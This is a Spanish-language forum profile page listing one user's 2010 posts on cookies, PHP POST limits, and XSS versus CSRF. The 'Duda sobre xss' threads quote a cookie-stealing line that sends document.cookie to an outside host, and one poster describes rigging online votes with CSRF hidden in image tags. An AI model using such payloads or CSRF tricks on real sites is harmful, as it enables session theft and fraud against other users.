Safari lo soporta apartir de su nueva versión 4.0
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#1022
Nivel Web / Re: Cookies
2 Febrero 2010, 23:24 PM
Eso seguro lo usan para evitar robo de sesiones, pero si el navegador no soporta OnlyHttp() este no funcionara.
#1023
PHP / Re: Method Get - Post
2 Febrero 2010, 22:32 PM
A lo que mucho se refieren con el método GET se llama QUERY_STRING.
El limite de carácter que puede almacenar una petición GET varia en diferentes navegadores.
Puedes mirar aqui
El limite de carácter del método POST se puede especificar. Yo por ejemplo instale php 5.2.10, para saber el limite de carácter de POST es necesario mirar el php.ini en la linea:
O tambien con el siguiente comando:
Saludos.
El limite de carácter que puede almacenar una petición GET varia en diferentes navegadores.
Puedes mirar aqui
El limite de carácter del método POST se puede especificar. Yo por ejemplo instale php 5.2.10, para saber el limite de carácter de POST es necesario mirar el php.ini en la linea:
Código [Seleccionar]
post_max_size = 8MO tambien con el siguiente comando:
Código [Seleccionar]
yoya@yoya-desktop:/etc/php5/$ cat php.ini|grep post_max
post_max_size = 8M
Saludos.
#1024
Nivel Web / Re: Cookies
2 Febrero 2010, 20:50 PM
Facir, como usas un addon para ver las cookies mejor, ps mira, las cookies de elhacker cambian al finalizar la sesión.
Saludos.
Saludos.
#1025
Nivel Web / Re: Duda sobre xss
29 Enero 2010, 00:26 AM
Lo de formulario es XSRF/CSRF no XSS...
#1026
PHP / Re: Expresión regular
25 Enero 2010, 23:57 PM
Deberian haber unas cuantas pruebas, asi uno pasa un buen rato xD.
#1027
Nivel Web / Re: Duda sobre xss
25 Enero 2010, 17:55 PMCita de: braulio23 en 25 Enero 2010, 17:45 PMUm.. claro porque el unico que interpreta el codigo javascript es el navegador, Osea, Por medio de la peticion GET con tags de img Si funciona, por medio de POST puse varias opciones como img, inframe, etc...Cita de: yoyahack en 24 Enero 2010, 22:48 PMEso si lo llamas en plan [nobbcode]Cita de: braulio23 en 24 Enero 2010, 22:18 PMClaro tio...Cita de: yoyahack en 24 Enero 2010, 21:54 PMY es verdad, no me fijé, el javascript no se ejecuta en el server.Cita de: cɐstg en 24 Enero 2010, 21:49 PM
asi de facil se ejecuta javascript en una imgaen :s seria muy facil robar cookies...
No entiendes bien, Cuando inserto una img con BBCODE estoy haciendo una peticion GET, pero cuando uso por ejemplo, <img <src=""> o un iframe estoy haciendo una peticion post. Si quieres puedes hacer una prueba..
Y otra cosa, Yo no estoy ejecutando javascript en la img, lo que estoy haciendo es hacer una peticion a un archivo y ese archivo con tiene un codigo javascript, osea el javascript se esta ejecutando en el host que tengo el archivo con javascript y no en la pagina que quiero atakar.
Pueden mirar este post que hay un tema parecido pero por POST.
http://foro.elhacker.net/nivel_web/problema_xsrf-t277033.0.html
La mejor forma de comprenderlo es practicandolo y veras su gran potencial... Una vez lo use para unas votaciones online y puse la url entre tags de img de BBCODE y funcionaba correctamente...
Pueden provarlo en localhost...Cita de: cɐstg en 24 Enero 2010, 22:15 PM
estas ejecutando el codigo javascript "document.topic.submit()" eso es javascript, y se fuera como vos decis yo te pongo, "window.location = 'miweb.com/cookie?c='+document.cookie"
Claro tio funcionara perfectamente pero se estara ejecutando en el serve donde subas el archivo con ese codigo javascript y no con el serve que quieres atakar. Osea te estas robando tus propias cookies y enviandotelas xD.[nobbcode] :
No funciona
Porque el javascript lo ejecuta solo el navegador, y si el navegador cree que eso es una imagen no buscará código javascript. El document.form.submit() lo hace el navegador no el server.
Por algo deje un link sobre un tema similar de ejecutar XSRF mediante POST.
http://foro.elhacker.net/nivel_web/problema_xsrf-t277033.0.html
#1028
Nivel Web / Re: Duda sobre xss
25 Enero 2010, 16:18 PM
XSS es parecido aa CSRF/XSRF, tambien con XSS permanente puedes aplicar CSRF o XSS Tuneling...
Lo que pasa esque XSS no es solo robar cookies, puedes hacer atakes mas elaborado dependiendo de tu conocimiento sobre javascript y luego que quieres hacer... Porque estas aplicando puro javascript xD.
Lo que pasa esque XSS no es solo robar cookies, puedes hacer atakes mas elaborado dependiendo de tu conocimiento sobre javascript y luego que quieres hacer... Porque estas aplicando puro javascript xD.
#1029
Nivel Web / Re: InvisionPowerBoard [IPB] (validator.php) full disclosure exploit [python]
24 Enero 2010, 23:22 PM
Esto deviria ir en Bug y Exploit.
#1030
Nivel Web / Re: Duda sobre xss
24 Enero 2010, 22:48 PMCita de: braulio23 en 24 Enero 2010, 22:18 PMClaro tio...Cita de: yoyahack en 24 Enero 2010, 21:54 PMY es verdad, no me fijé, el javascript no se ejecuta en el server.Cita de: cɐstg en 24 Enero 2010, 21:49 PM
asi de facil se ejecuta javascript en una imgaen :s seria muy facil robar cookies...
No entiendes bien, Cuando inserto una img con BBCODE estoy haciendo una peticion GET, pero cuando uso por ejemplo, <img <src=""> o un iframe estoy haciendo una peticion post. Si quieres puedes hacer una prueba..
Y otra cosa, Yo no estoy ejecutando javascript en la img, lo que estoy haciendo es hacer una peticion a un archivo y ese archivo con tiene un codigo javascript, osea el javascript se esta ejecutando en el host que tengo el archivo con javascript y no en la pagina que quiero atakar.
Pueden mirar este post que hay un tema parecido pero por POST.
http://foro.elhacker.net/nivel_web/problema_xsrf-t277033.0.html
La mejor forma de comprenderlo es practicandolo y veras su gran potencial... Una vez lo use para unas votaciones online y puse la url entre tags de img de BBCODE y funcionaba correctamente...
Pueden provarlo en localhost...
Cita de: cɐstg en 24 Enero 2010, 22:15 PM
estas ejecutando el codigo javascript "document.topic.submit()" eso es javascript, y se fuera como vos decis yo te pongo, "window.location = 'miweb.com/cookie?c='+document.cookie"
Claro tio funcionara perfectamente pero se estara ejecutando en el serve donde subas el archivo con ese codigo javascript y no con el serve que quieres atakar. Osea te estas robando tus propias cookies y enviandotelas xD.